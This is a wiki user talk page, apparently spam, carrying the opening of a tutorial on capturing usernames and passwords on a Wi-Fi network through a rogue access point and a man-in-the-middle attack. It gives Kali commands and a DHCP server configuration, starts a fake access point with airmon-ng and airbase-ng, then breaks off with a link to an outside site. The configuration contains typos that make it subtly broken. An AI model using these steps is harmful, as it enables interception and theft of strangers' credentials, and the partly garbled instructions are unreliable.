User talk:Uubutt

 Capturing All passwords and usernames on a wifi network In this tutorial we will be doing a MITM attack via a Fake Access Point That’s what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack. Basically a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don’t know what is an MITM attack, even after the thousands of post, This method uses a dhcp server. There are other methods which I will cover in another tutorial. So let’s start. What do you need? 1. Either a VM running Kali or a PC/Laptop running it 2. 2x Network adapter (or a wired connection) 3. one of them must support both, monitor and master mode What do you need to do? Configure the DHCP Server 1. Open terminal 2. route -n (note Gateway I’ll assume the GW is 192.168.0.1) 3. apt-get install dhcp3-server (install the dhcp3 server) 4. nano /etc/dhcpd.conf (configure the dhcp serv) 5. type or paste the following into your .conf authorative; default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.255.255.0; option domain-name “name you want the router to be called” option domain-name-servers 192.168.1.1; ranger 192.168.1.2 192.168.1.40; } 6. Hit ctrl+x then y then enter (save the file) Start the AP 1. airmon-ng (check Net.Adap. will asume it’s wlan0) 2. airmon-ng start wlan0 (start the mon mode = mon0) 3. airbase-ng -c 11 -e “name you want it to be called” mon0 4. DON’T CLOSE THE TERMINAL Configure the Tunnel Interface You can Read Rest of the article on http://masti92.com/capturing-passwords-usernames-wifi-network/ 'Bold text'